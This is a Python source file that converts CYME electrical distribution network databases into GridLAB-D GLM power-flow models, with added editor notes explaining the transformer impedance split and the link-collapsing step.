{\n\t\t\t\t\t\"phases\" : cyme_phase_name[phase],\n\t\t\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t\t\t\"from\" : self.name(from_node_id,\"node\"),\n\t\t\t\t\t\"to\" : 
self.name(to_node_id,\"node\"),\n\t\t\t\t\t})\n\t\t\t\tkwargs[\"node_links\"][from_node_id].append(device_id)\n\t\t\t\tkwargs[\"node_links\"][to_node_id].append(device_id)\n\t\t\telse:\n\t\t\t\twarning(f\"{cyme_mdbname}@{network_id}: {cyme_devices[device_type]} on section {section_id} has no corresponding GLM object\")\n\t\treturn device_dict\n\n\t# add node to glm file\n\tdef add_node(self,node_id,node_links,device_dict,version):\n\t\tphase = 0\n\t\tfor device_id in node_links[node_id]:\n\t\t\tphase |= glm_phase_code[device_dict[device_id][\"phases\"]]\n\t\tobj = self.object(\"node\", self.name(node_id,\"node\"), {\n\t\t\t\"phases\" : glm_phase_name[phase]+\"N\",\n\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t})\n\t\tif node_id == table_get(cyme_table[\"headnode\"],network_id,\"NodeId\"):\n\t\t\tobj[\"bustype\"] = \"SWING\"\n\t\telse:\n\t\t\tobj[\"bustype\"] = \"PQ\"\n\t\treturn obj\n\n\t# add an overhead based on a link\n\tdef add_overhead_line(self,line_id,line,version):\n\t\tline_name = self.name(line_id,\"link\")\n\t\tlength = float(line[\"Length\"])\n\t\tconductorA_id = line[\"PhaseConductorIdA\"]\n\t\tconductorB_id = line[\"PhaseConductorIdB\"]\n\t\tconductorC_id = line[\"PhaseConductorIdC\"]\n\t\tconductorN_id = line[\"NeutralConductorId\"]\n\t\tself.add_overhead_line_conductors([conductorA_id,conductorB_id,conductorC_id,conductorN_id],version)\n\t\tspacing_id = line[\"ConductorSpacingId\"]\n\t\tself.add_line_spacing(spacing_id,version)\n\t\tconfiguration_name = self.add_line_configuration([conductorA_id,conductorB_id,conductorC_id,conductorN_id,spacing_id],version)\n\t\treturn self.object(\"overhead_line\", line_name, {\n\t\t\t\"length\" : \"%.2f m\"%length,\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t})\n\n\t# add an unbalanced overhead line based on a link\n\tdef add_overhead_line_unbalanced(self,line_id,line,version):\n\t\tline_name = self.name(line_id,\"link\")\n\t\tconfiguration_id = line[\"LineId\"]\n\t\tconfiguration_name = self.name(configuration_id,\"line_configuration\")\n\t\tlength = float(line[\"Length\"])\n\t\tif not configuration_name in self.objects.keys():\n\t\t\tconfiguration = cyme_table[\"eqoverheadlineunbalanced\"].loc[configuration_id]\n\t\t\tconductorA_id = configuration[\"PhaseConductorIdA\"]\n\t\t\tconductorB_id = configuration[\"PhaseConductorIdB\"]\n\t\t\tconductorC_id = configuration[\"PhaseConductorIdC\"]\n\t\t\tconductorN_id = configuration[\"NeutralConductorId\"]\n\t\t\tconductor_names = self.add_overhead_line_conductors([conductorA_id,conductorB_id,conductorC_id,conductorN_id],version)\n\t\t\tspacing_id = configuration[\"ConductorSpacingId\"]\n\t\t\tspacing_name = self.add_line_spacing(spacing_id,version)\n\t\t\tself.object(\"line_configuration\",configuration_name,{\n\t\t\t\t\"conductor_A\" : conductor_names[0],\n\t\t\t\t\"conductor_B\" : conductor_names[1],\n\t\t\t\t\"conductor_C\" : conductor_names[2],\n\t\t\t\t\"conductor_N\" : conductor_names[3],\n\t\t\t\t\"spacing\" : spacing_name,\n\t\t\t\t})\n\t\treturn self.object(\"overhead_line\", line_name, {\n\t\t\t\"length\" : \"%.2f m\"%length,\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t})\n\n\t# add overhead line conductor library entry\n\tdef add_overhead_line_conductors(self,conductors,version):\n\t\tconductor_names = []\n\t\tfor conductor_id in conductors:\n\t\t\tconductor_name = self.name(conductor_id,\"overhead_line_conductor\")\n\t\t\tif not conductor_name in self.objects.keys():\n\t\t\t\tconductor = cyme_table[\"eqconductor\"].loc[conductor_id]\n\t\t\t\tgmr 
= float(conductor[\"GMR\"])\n\t\t\t\tr25 = float(conductor[\"R25\"])\n\t\t\t\tdiameter = float(conductor[\"Diameter\"])\n\t\t\t\tnominal_rating = float(conductor[\"NominalRating\"])\n\t\t\t\tobj = self.object(\"overhead_line_conductor\",conductor_name,{\n\t\t\t\t\t\"geometric_mean_radius\" : \"%.2f cm\" % gmr,\n\t\t\t\t\t\"resistance\" : \"%.5f Ohm/km\" % r25,\n\t\t\t\t\t\"diameter\" : \"%.2f cm\" % diameter,\n\t\t\t\t\t\"rating.summer.continuous\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t\"rating.winter.continuous\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t\"rating.summer.emergency\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t\"rating.winter.emergency\" : \"%.1f A\" % nominal_rating,\n\t\t\t\t\t})\n\t\t\tconductor_names.append(conductor_name)\n\t\treturn conductor_names\n\n\t# line spacing library object\n\tdef add_line_spacing(self,spacing_id,version):\n\t\tspacing_name = self.name(spacing_id,\"line_spacing\")\n\t\tif not spacing_name in self.objects.keys():\n\t\t\tspacing = cyme_table[\"eqgeometricalarrangement\"].loc[spacing_id]\n\t\t\tAx = float(spacing[\"ConductorA_Horizontal\"])\n\t\t\tAy = float(spacing[\"ConductorA_Vertical\"])\n\t\t\tBx = float(spacing[\"ConductorB_Horizontal\"])\n\t\t\tBy = float(spacing[\"ConductorB_Vertical\"])\n\t\t\tCx = float(spacing[\"ConductorC_Horizontal\"])\n\t\t\tCy = float(spacing[\"ConductorC_Vertical\"])\n\t\t\tNx = float(spacing[\"NeutralConductor_Horizontal\"])\n\t\t\tNy = float(spacing[\"NeutralConductor_Vertical\"])\n\t\t\tABx = Ax-Bx; ABy = Ay-By\n\t\t\tACx = Ax-Cx; ACy = Ay-Cy\n\t\t\tBCx = Bx-Cx; BCy = By-Cy\n\t\t\tANx = Ax-Nx; ANy = Ay-Ny\n\t\t\tBNx = Bx-Nx; BNy = By-Ny\n\t\t\tCNx = Cx-Nx; CNy = Cy-Ny\n\t\t\tself.object(\"line_spacing\",spacing_name,{\n\t\t\t\t\"distance_AB\" : \"%.2f m\"%sqrt(ABx*ABx+ABy*ABy),\n\t\t\t\t\"distance_AC\" : \"%.2f m\"%sqrt(ACx*ACx+ACy*ACy),\n\t\t\t\t\"distance_BC\" : \"%.2f m\"%sqrt(BCx*BCx+BCy*BCy),\n\t\t\t\t\"distance_AN\" : \"%.2f m\"%sqrt(ANx*ANx+ANy*ANy),\n\t\t\t\t\"distance_BN\" : \"%.2f m\"%sqrt(BNx*BNx+BNy*BNy),\n\t\t\t\t\"distance_CN\" : \"%.2f m\"%sqrt(CNx*CNx+CNy*CNy),\n\t\t\t\t\"distance_AE\" : \"%.2f m\"%Ay,\n\t\t\t\t\"distance_BE\" : \"%.2f m\"%By,\n\t\t\t\t\"distance_CE\" : \"%.2f m\"%Cy,\n\t\t\t\t\"distance_NE\" : \"%.2f m\"%Ny,\n\t\t\t\t})\n\t\treturn spacing_name\n\n\t# line configuration library object\n\tdef add_line_configuration(self,items,version):\n\t\tconfiguration_id = \"_\".join(items)\n\t\tconfiguration_name = self.name(configuration_id,\"line_configuration\")\n\t\tif not configuration_name in self.objects.keys():\n\t\t\tself.object(\"line_configuration\",configuration_name,{\n\t\t\t\t\"conductor_A\" : self.name(items[0],\"overhead_line_conductor\"),\n\t\t\t\t\"conductor_B\" : self.name(items[1],\"overhead_line_conductor\"),\n\t\t\t\t\"conductor_C\" : self.name(items[2],\"overhead_line_conductor\"),\n\t\t\t\t\"conductor_N\" : self.name(items[3],\"overhead_line_conductor\"),\n\t\t\t\t\"spacing\" : self.name(items[4],\"line_spacing\")\n\t\t\t\t})\n\t\treturn configuration_name\n\n\t# get the phase switch status\n\tdef get_switch_phase_status(self,phases,state):\n\t\tif state in phases:\n\t\t\treturn \"CLOSED\"\n\t\telse:\n\t\t\treturn \"OPEN\"\n\n\t# add a switch based on a link\n\tdef add_switch(self,switch_id,switch,version):\n\t\tswitch_name = self.name(switch_id,\"link\")\n\t\tphases = cyme_phase_name[int(switch[\"ClosedPhase\"])]\n\t\treturn self.object(\"switch\", switch_name, {\n\t\t\t\"phase_A_state\" : self.get_switch_phase_status(phases,\"A\"),\n\t\t\t\"phase_B_state\" : 
self.get_switch_phase_status(phases,\"B\"),\n\t\t\t\"phase_C_state\" : self.get_switch_phase_status(phases,\"C\"),\n\t\t\t\"operating_mode\" : \"BANKED\"\n\t\t\t})\n\n\t# add a load\n\tdef add_load(self,load_id,load,version):\n\t\tsection_id = table_get(cyme_table[\"sectiondevice\"],load_id,\"SectionId\")\n\t\tsection = table_get(cyme_table[\"section\"],section_id)\n\t\tdevice_type = int(table_get(cyme_table[\"sectiondevice\"],load_id,\"DeviceType\"))\n\t\tif device_type == 20: # spot load is attached at from node of section\n\t\t\tparent_name = self.name(section[\"FromNodeId\"],\"node\")\n\t\telif device_type == 21: # distributed load is attached at to node of section\n\t\t\tparent_name = self.name(section[\"ToNodeId\"],\"node\")\n\t\telse:\n\t\t\traise Exception(f\"CYME device type {device_type} is not supported as a load\")\n\t\tcustomer_id = load[\"CustomerNumber\"]\n\n\t\tlink_name = self.name(load_id,\"link\")\n\t\tif link_name in self.objects.keys(): # link is no longer needed\n\t\t\tself.delete(link_name)\n\t\t\n\t\tload_name = self.name(load_id,\"load\")\n\t\tdevice_type = int(load[\"DeviceType\"])\n\t\tphase = cyme_phase_name[int(load[\"Phase\"])]\n\t\tif load_name in self.objects.keys() and \"phases\" in self.objects[load_name]:\n\t\t\tphases = self.objects[load_name][\"phases\"] + phase\n\t\telse:\n\t\t\tphases = phase\n\t\tif device_type in glm_devices.keys():\n\t\t\tConsumerClassId = load[\"ConsumerClassId\"]\n\t\t\tload_value1 = float(load[\"LoadValue1\"])\n\t\t\tload_value2 = float(load[\"LoadValue2\"])\n\t\t\tload_types = {\"Z\":\"constant_impedance\",\"I\":\"constant_current\",\"P\":\"constant_power\"}\n\t\t\tif ConsumerClassId in load_types.keys():\n\t\t\t\treturn self.object(\"load\",load_name,{\n\t\t\t\t\t\"parent\" : parent_name,\n\t\t\t\t\t\"phases\" : phases,\n\t\t\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t\t\tf\"{load_types[ConsumerClassId]}_{phase}\" : \"%.4g%+.4gj\" % (load_value1,load_value2),\n\t\t\t\t\t})\n\t\t\telif ConsumerClassId in [\"PQ\",\"PV\",\"SWING\",\"SWINGPQ\"]: # GLM bus types allowed\n\t\t\t\treturn self.object(\"load\",load_name,{\n\t\t\t\t\t\"parent\" : parent_name,\n\t\t\t\t\t\"phases\" : phases,\n\t\t\t\t\t\"nominal_voltage\" : \"${GLM_NOMINAL_VOLTAGE}\",\n\t\t\t\t\t\"bustype\" : ConsumerClassId,\n\t\t\t\t\tf\"constant_impedance_{phase}\" : \"%.4g%+.4gj\" % (load_value1,load_value2),\n\t\t\t\t\t})\n\t\telse:\n\t\t\twarning(f\"{cyme_mdbname}@{network_id}: load '{load_id}' on phase '{phase}' dropped because '{cyme_devices[device_type]}' is not a supported CYME device type\")\n\n\t# add a capacitor\n\tdef add_capacitor(self,capacitor_id,capacitor,version):\n\t\tsection_id = table_get(cyme_table[\"sectiondevice\"],capacitor_id,\"SectionId\")\n\t\tsection = table_get(cyme_table[\"section\"],section_id)\n\t\tfrom_name = self.name(section[\"FromNodeId\"],\"node\")\n\t\tto_name = self.name(section[\"ToNodeId\"],\"node\")\n\n\t\tlink_name = self.name(capacitor_id,\"link\")\n\t\tif link_name in self.objects.keys(): # link is no longer needed\n\t\t\tself.delete(link_name)\n\t\t\n\t\tcapacitor_name = self.name(capacitor_id,\"capacitor\")\n\t\tphase = cyme_phase_name[int(capacitor[\"Phase\"])]\n\t\tKVARA = float(capacitor[\"KVARA\"])\n\t\tKVARB = float(capacitor[\"KVARB\"])\n\t\tKVARC = float(capacitor[\"KVARC\"])\n\t\tKVLN = float(capacitor[\"KVLN\"])\n\t\tswitchA = \"CLOSED\"\n\t\tself.assume(capacitor_name,\"switchA\",switchA,f\"capacitor {capacitor_id} does not specify switch A position, valid options are 'CLOSED' or 
'OPEN'\")\n\t\tswitchB = \"CLOSED\"\n\t\tself.assume(capacitor_name,\"switchB\",switchB,f\"capacitor {capacitor_id} does not specify switch B position, valid options are 'CLOSED' or 'OPEN'\")\n\t\tswitchC = \"CLOSED\"\n\t\tself.assume(capacitor_name,\"switchC\",switchC,f\"capacitor {capacitor_id} does not specify switch C position, valid options are 'CLOSED' or 'OPEN'\")\n\t\tcontrol = \"MANUAL\"\n\t\tself.assume(capacitor_name,\"control\",control,f\"capacitor {capacitor_id} does not specify a control strategy, valid options are 'CURRENT', 'VARVOLT', 'VOLT', 'VAR', or 'MANUAL'\")\n\t\treturn self.object(\"capacitor\",capacitor_name,{\n\t\t\t\"parent\" : from_name,\n\t\t\t\"nominal_voltage\" : f\"{KVLN} kV\",\n\t\t\t\"phases\" : phase,\n\t\t\t\"phases_connected\" : phase,\n\t\t\t\"capacitor_A\" : f\"{KVARA} kVA\",\n\t\t\t\"capacitor_B\" : f\"{KVARB} kVA\",\n\t\t\t\"capacitor_C\" : f\"{KVARC} kVA\",\n\t\t\t\"switchA\" : switchA,\n\t\t\t\"switchB\" : switchB,\n\t\t\t\"switchC\" : switchC,\n\t\t\t\"control\" : control,\n\t\t\t})\n\n\t# add a transformer\n\tdef add_transformer(self,transformer_id, transformer,version):\n\t\tDeviceType = int(transformer[\"DeviceType\"])\n\t\tequipment_id = transformer[\"EquipmentId\"]\n\t\tequipment = cyme_table[\"eqtransformer\"].loc[equipment_id]\n\t\tNominalRatingKVA = float(equipment[\"NominalRatingKVA\"])\n\t\tPrimaryVoltageKVLL = float(equipment[\"PrimaryVoltageKVLL\"])\n\t\tSecondaryVoltageKVLL = float(equipment[\"SecondaryVoltageKVLL\"])\n\t\tPosSeqImpedancePercent = float(equipment[\"PosSeqImpedancePercent\"])\n\t\tXRRatio = float(equipment[\"XRRatio\"])\n\t\tr = PosSeqImpedancePercent / 100.0 / sqrt(1+XRRatio**2) # split the impedance magnitude |Z| (given in percent) into R and X using the X/R ratio\n\t\tx = r * XRRatio\n\t\tnominal_rating = \"%.4gkVA\" % (NominalRatingKVA)\n\t\tprimary_voltage = \"%.4gkV\" % (PrimaryVoltageKVLL/sqrt(3.0))\n\t\tsecondary_voltage = \"%.4gkV\" % (SecondaryVoltageKVLL/sqrt(3.0))\n\t\tconfiguration_name = self.name([nominal_rating,primary_voltage,secondary_voltage,\"R%.4g\"%(r),\"X%.4g\"%(x)], \"transformer_configuration\")\n\t\tif primary_voltage == secondary_voltage:\n\t\t\tsecondary_voltage = \"%.4gkV\" % ((SecondaryVoltageKVLL+0.001)/sqrt(3.0))\n\t\t\tself.assume(configuration_name,\"secondary_voltage\",secondary_voltage,f\"transformer {transformer_id} primary voltage is the same as secondary voltage\")\n\t\tif r == 0.0:\n\t\t\tr = 0.000333\n\t\t\tx = 0.00222\n\t\t\tself.assume(configuration_name,\"resistance\",r,f\"transformer {transformer_id} impedance is zero\")\n\t\t\tself.assume(configuration_name,\"reactance\",x,f\"transformer {transformer_id} impedance is zero\")\n\n\t\tconnect_type = \"WYE_WYE\"\n\t\tself.assume(configuration_name,\"connect_type\",connect_type,f\"transformer '{transformer_id}' does not specify connection type\")\n\t\tinstall_type = \"PADMOUNT\"\n\t\tself.assume(configuration_name,\"install_type\",install_type,f\"transformer '{transformer_id}' does not specify install type\")\n\n\t\tself.object(\"transformer_configuration\", configuration_name, {\n\t\t\t\"connect_type\" : connect_type,\n\t\t\t\"install_type\" : install_type,\n\t\t\t\"power_rating\" : nominal_rating,\n\t\t\t\"primary_voltage\" : primary_voltage,\n\t\t\t\"secondary_voltage\" : secondary_voltage,\n\t\t\t\"resistance\" : r,\n\t\t\t\"reactance\" : x,\n\t\t\t})\n\t\tlink_name = self.name(transformer_id,\"link\")\n\t\treturn self.object(\"transformer\", link_name, {\n\t\t\t\"nominal_voltage\" : None,\n\t\t\t\"phases\" : \"\".join(sorted(set(self.objects[link_name][\"phases\"] + \"N\"))),\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t})
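	# Editor's note: a worked example (illustrative numbers) for the impedance split
	# in add_transformer above. With PosSeqImpedancePercent = 5 and XRRatio = 4, the
	# per-unit impedance magnitude is |Z| = 0.05, so
	#   r = 0.05 / sqrt(1 + 4**2) = 0.05 / 4.1231... ~= 0.012127
	#   x = r * 4 ~= 0.048507
	# and sqrt(r**2 + x**2) recovers 0.05, as expected.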
\n\n\t# add a regulator\n\tdef add_regulator(self, regulator_id, regulator, version):\n\t\tequipment_id = regulator[\"EquipmentId\"]\n\t\tequipment = cyme_table[\"eqregulator\"].loc[equipment_id]\n\n\t\tCTPrimaryRating = float(regulator[\"CTPrimaryRating\"])\n\t\tPTRatio = float(regulator[\"PTRatio\"])\n\t\tBandWidth = float(regulator[\"BandWidth\"])\n\t\tBoostPercent = float(regulator[\"BoostPercent\"])\n\t\tBuckPercent = float(regulator[\"BuckPercent\"])\n\t\tTapPositionA = float(regulator[\"TapPositionA\"])\n\t\tTapPositionB = float(regulator[\"TapPositionB\"])\n\t\tTapPositionC = float(regulator[\"TapPositionC\"])\n\t\tControlStatus = float(regulator[\"ControlStatus\"])\n\t\tReverseSensingMode = float(regulator[\"ReverseSensingMode\"])\n\t\tReverseThreshold = float(regulator[\"ReverseThreshold\"])\n\t\tX = float(regulator[\"X\"])\n\t\tY = float(regulator[\"Y\"])\n\t\tStatus = int(regulator[\"Status\"])\n\t\tReversible = int(regulator[\"Reversible\"])\n\n\t\tRatedKVA = float(equipment[\"RatedKVA\"])\n\t\tRatedKVLN = float(equipment[\"RatedKVLN\"])\n\t\tNumberOfTaps = int(equipment[\"NumberOfTaps\"])\n\n\t\tconnect_type = \"WYE_WYE\"\n\t\tControl = \"OUTPUT_VOLTAGE\"\n\t\ttime_delay = \"30s\"\n\t\tband_center = \"${GLM_NOMINAL_VOLTAGE}\"\n\t\tband_width = \"%.1fV\" % (BandWidth)\n\t\tconfiguration_name = self.name([band_width,time_delay],\"regulator_configuration\")\n\t\tself.assume(configuration_name,\"connect_type\",connect_type,f\"regulator '{regulator_id}' does not specify connection type\")\n\t\tself.assume(configuration_name,\"Control\",Control,f\"regulator '{regulator_id}' does not specify control type\")\n\t\tself.assume(configuration_name,\"time_delay\",time_delay,f\"regulator '{regulator_id}' does not specify time delay\")\n\t\tself.assume(configuration_name,\"band_center\",band_center,f\"regulator '{regulator_id}' does not specify band center\")\n\n\t\tself.object(\"regulator_configuration\", configuration_name, {\n\t\t\t\"connect_type\" : connect_type,\n\t\t\t\"band_center\" : band_center,\n\t\t\t\"band_width\" : band_width,\n\t\t\t\"time_delay\" : time_delay,\n\t\t\t\"raise_taps\" : \"%.0f\" % float(NumberOfTaps/2),\n\t\t\t\"lower_taps\" : \"%.0f\" % float(NumberOfTaps/2),\n\t\t\t\"regulation\" : \"%.1f%%\" % (BandWidth / RatedKVLN * 100),\n\t\t\t\"tap_pos_A\" : \"%.0f\" % (TapPositionA),\n\t\t\t\"tap_pos_B\" : \"%.0f\" % (TapPositionB),\n\t\t\t\"tap_pos_C\" : \"%.0f\" % (TapPositionC),\n\t\t\t\"Control\" : Control\n\t\t\t})\n\n\t\tlink_name = self.name(regulator_id,\"link\")\n\t\tregulator_name = self.name(regulator_id,\"regulator\")\n\t\tsense_node = self.objects[link_name][\"to\"]\n\t\tself.assume(link_name,\"sense_node\",sense_node,f\"regulator '{regulator_id}' does not specify sense node\")\n\t\treturn self.object(\"regulator\", link_name, {\n\t\t\t\"configuration\" : configuration_name,\n\t\t\t\"sense_node\" : sense_node,\n\t\t\t})\n\n#\n# CYME 5 MDB extractor\n#\ndef cyme_extract_5020(network_id,network):\n\n\tcreation_time = int(network[\"CreationTime\"])\n\tlast_change = int(network[\"LastChange\"])\n\tload_factor = float(network[\"LoadFactor\"])\n\tglmname = os.path.abspath(f\"{output_folder}/{cyme_mdbname}_{network_id}.glm\")\n\n\tglm = GLM(glmname,\"w\")\n\tglm.comment(\n\t\tf\"Automatically generated by {git_project.replace('.git','/postproc/write_glm.py')}\",\n\t\t)\n\n\tglm.blank()\n\tglm.comment(\"\",\"Application 
information\",\"\")\n\tglm.define(\"APP_COMMAND\",app_command)\n\tglm.define(\"APP_VERSION\",app_version)\n\n\tglm.blank()\n\tglm.comment(\"\",\"Git information\",\"\")\n\tglm.define(\"GIT_PROJECT\",git_project)\n\tglm.define(\"GIT_COMMIT\",git_commit)\n\tglm.define(\"GIT_BRANCH\",git_branch)\n\n\tglm.blank()\n\tglm.comment(\"\",\"GLM creation context\",\"\")\n\tglm.define(\"GLM_PATHNAME\",glmname)\n\tglm.define(\"GLM_CREATED\",dt.datetime.utcnow().isoformat())\n\tglm.define(\"GLM_USER\",os.getenv(\"USER\"))\n\tglm.define(\"GLM_WORKDIR\",os.getenv(\"PWD\"))\n\tglm.define(\"GLM_LANG\",os.getenv(\"LANG\"))\n\n\t# settings from model\n\tglm.blank()\n\tglm.comment(\"\",\"CYME model information\",\"\")\n\tglm.define(\"CYME_MDBNAME\",cyme_mdbname)\n\tglm.define(\"CYME_VERSION\",version)\n\tglm.define(\"CYME_CREATED\",dt.datetime.fromtimestamp(creation_time).isoformat())\n\tglm.define(\"CYME_MODIFIED\",dt.datetime.fromtimestamp(last_change).isoformat())\n\tglm.define(\"CYME_LOADFACTOR\",load_factor)\n\tglm.define(\"CYME_NETWORKID\",network_id)\n\n\t# settings from config.csv\n\tglm.blank()\n\tglm.comment(\"\",\"Settings from 'config.csv'\",\"\")\n\tdefine = settings[\"GLM_DEFINE\"].split(\"=\")\n\tif type(define) is list and len(define) > 1:\n\t\tglm.define(define[0].strip(),\"=\".join(define[1:]).strip())\n\tif settings[\"GLM_NOMINAL_VOLTAGE\"]:\n\t\tglm.define(\"GLM_NOMINAL_VOLTAGE\",settings[\"GLM_NOMINAL_VOLTAGE\"])\n\tfor include in settings[\"GLM_INCLUDE\"].split():\n\t\tglm.include(include.strip())\n\tif not settings[\"GLM_NOMINAL_VOLTAGE\"]:\n\t\tif settings[\"GLM_INCLUDE\"]: # cannot verify setting in GLM_INCLUDE until run in gridlabd\n\t\t\tglm.ifndef(\"GLM_NOMINAL_VOLTAGE\",lambda:glm.error(\"GLM_NOMINAL_VOLTAGE must be defined in either 'config.csv' or the GLM_INCLUDE file\"))\n\t\telse:\n\t\t\terror(\"GLM_NOMINAL_VOLTAGE must be defined in either 'config.csv' or the GLM_INCLUDE file\")\n\n\tglm.blank()\n\tglm.comment(\"\",\"Modules\",\"\")\n\tglm.module(\"powerflow\",{\"solver_method\":\"NR\"})\n\n\tnode_dict = {}\n\tdevice_dict = {}\n\tnode_links = {}\n\n\t# cyme_table[\"node\"] graph data\n\tfor node_id, node in table_find(cyme_table[\"node\"],NetworkId=network_id).iterrows():\n\t\tnode_links[node_id] = [] # incident links\n\t\tnode_dict[node_id] = [] # node dictionary\n\n\tglm.blank()\n\tglm.comment(\"\",\"Objects\",\"\")\n\n\t# links\n\tfor section_id, section in table_find(cyme_table[\"section\"],NetworkId=network_id).iterrows():\n\t\tlinks = glm.add(\"link\",section_id,section, version=5020, node_links=node_links)\n\t\tif links:\n\t\t\tdevice_dict.update(links)\n\n\t# cyme_table[\"node\"]\n\tfor node_id in node_dict.keys():\n\t\tnode_dict[node_id] = glm.add_node(node_id, node_links, device_dict, version=5020)\n\n\t# overhead lines\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"overheadbyphase\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"overhead_line\", cyme_id, cyme_data, version=5020)\n\n\t# unbalanced overhead lines\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"overheadlineunbalanced\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"overhead_line_unbalanced\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"load\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"customerload\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"load\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"transformer\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"transformer\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"transformer\", cyme_id, 
cyme_data, version=5020)\n\n\t# cyme_table[\"regulator\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"regulator\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"regulator\", cyme_id, cyme_data, version=5020)\n\n\t# cyme_table[\"capacitor\"]\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"shuntcapacitor\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"capacitor\", cyme_id, cyme_data, version=5020)\n\n\t# switches\n\tfor cyme_id, cyme_data in table_find(cyme_table[\"switch\"],NetworkId=network_id).iterrows():\n\t\tglm.add(\"switch\", cyme_id, cyme_data, version=5020)\n\n\t# collapse links\n\tdone = False\n\twhile not done:\n\t\tdone = True\n\t\tfor name in list(glm.objects.keys()):\n\t\t\ttry:\n\t\t\t\tdata = glm.objects[name]\n\t\t\t\tif \"class\" in data.keys() and data[\"class\"] == \"link\": # needs to be collapsed\n\t\t\t\t\tfrom_node = data[\"from\"]\n\t\t\t\t\tto_node = data[\"to\"]\n\t\t\t\t\twhile \"parent\" in glm.objects[to_node].keys() and glm.objects[glm.objects[to_node][\"parent\"]][\"class\"] == \"node\": # parents are stored by name; don't allow grandchild cyme_table[\"node\"]\n\t\t\t\t\t\tto_node = glm.objects[to_node][\"parent\"]\n\t\t\t\t\tglm.objects[to_node][\"parent\"] = from_node\n\t\t\t\t\tglm.delete(name)\n\t\t\t\t\tdone = False\n\t\t\t\t\tbreak\n\t\t\t\telif \"class\" in data.keys() and data[\"class\"] in [\"node\",\"load\"] and \"parent\" in data.keys():\n\t\t\t\t\tparent_name = data[\"parent\"]\n\t\t\t\t\tparent_data = glm.objects[parent_name]\n\t\t\t\t\tif \"class\" in parent_data.keys() and parent_data[\"class\"] in [\"node\",\"load\"] and \"parent\" in parent_data.keys():\n\t\t\t\t\t\tgrandparent = parent_data[\"parent\"]\n\t\t\t\t\t\tdata[\"parent\"] = grandparent\n\t\t\t\t\t\tdone = False\n\t\t\t\t\t\tbreak\n\t\t\texcept Exception as exc:\n\t\t\t\twarning(format_exception(\"link removal failed\",name,glm.objects[name]))\n\t\t\t\tglm.delete(name)\n\n\t#\n\t# Check conversion\n\t#\n\tfor name, data in glm.objects.items():\n\t\tif not \"name\" in data.keys():\n\t\t\twarning(\"%s: object does not have a name, object data [%s]\" % (glm.filename,data))\n\t\telif not \"class\" in data.keys():\n\t\t\twarning(\"%s: object '%s' does not have a class\" % (glm.filename,data[\"name\"]))\n\t\telif data[\"class\"] in [\"link\",\"powerflow_object\",\"line\"]:\n\t\t\twarning(\"%s: object '%s' uses abstract-only class '%s'\" % (glm.filename,data[\"name\"],data[\"class\"]))\n\n\tglm.close()\n
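# Editor's note: a standalone sketch of the link-collapsing step above, assuming plain
# dicts keyed by object name (the same shape as GLM.objects). Each link is replaced by
# a parent reference on its to-node, then parent chains are flattened so no object is
# left a grandchild. Hypothetical helper, not used by the conversion itself.
def _demo_collapse(objects):
	for name in [n for n, o in objects.items() if o["class"] == "link"]:
		link = objects.pop(name)
		objects[link["to"]]["parent"] = link["from"]
	for obj in objects.values():
		while "parent" in obj and "parent" in objects[obj["parent"]]:
			obj["parent"] = objects[obj["parent"]]["parent"]
	return objects

# A <- link1 <- B and B <- link2 <- C collapse to B.parent = A and C.parent = A
_demo = _demo_collapse({
	"A" : {"class" : "node"}, "B" : {"class" : "node"}, "C" : {"class" : "node"},
	"link1" : {"class" : "link", "from" : "A", "to" : "B"},
	"link2" : {"class" : "link", "from" : "B", "to" : "C"},
	})
assert _demo["B"]["parent"] == "A" and _demo["C"]["parent"] == "A"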
\n#\n# Process cyme_table[\"network\"]\n#\ncyme_extract = {\n\t\"50\" : cyme_extract_5020, # CYME version 5 database\n}\ncyme_extract[\"-1\"] = cyme_extract[str(default_cyme_extractor)]\nnetwork_count = 0\nfor network_id, network in cyme_table[\"network\"].iterrows():\n\n\tif not re.match(settings[\"GLM_NETWORK_MATCHES\"],network_id):\n\t\tcontinue\n\telse:\n\t\tnetwork_count += 1\n\n\tversion = network[\"Version\"]\n\tfound = False\n\tfor key, extractor in cyme_extract.items():\n\t\tif re.match(key,version):\n\t\t\tif version == \"-1\":\n\t\t\t\twarning(f\"CYME model version is not specified (version=-1), using default extractor for version '{default_cyme_extractor}*'\")\n\t\t\textractor(network_id,network)\n\t\t\tfound = True\n\tif not found:\n\t\traise Exception(f\"CYME model version {version} is not supported\")\n\n#\n# Final checks\n#\n\nif network_count == 0:\n\twarning(f\"{cyme_mdbname}: the network pattern '{settings['GLM_NETWORK_MATCHES']}' did not match any networks in the database\")\nelif warning_count > 0:\n\tprint(\"Model conversion problems can be corrected using 'GLM_MODIFY=modify.csv' in 'config.csv'.\")\n\tprint(\" See http://docs.gridlabd.us/index.html?owner=openfido&project=cyme-extract&doc=/Post_processing/Write_glm.md for details\")\n\nprint(f\"CYME-to-GridLAB-D conversion done: {network_count} networks processed, {warning_count} warnings, {error_count} errors\")\n","repo_name":"xiefuhong/cyme-extract","sub_path":"postproc/write_glm.py","file_name":"write_glm.py","file_ext":"py","file_size_in_byte":38739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"65"}
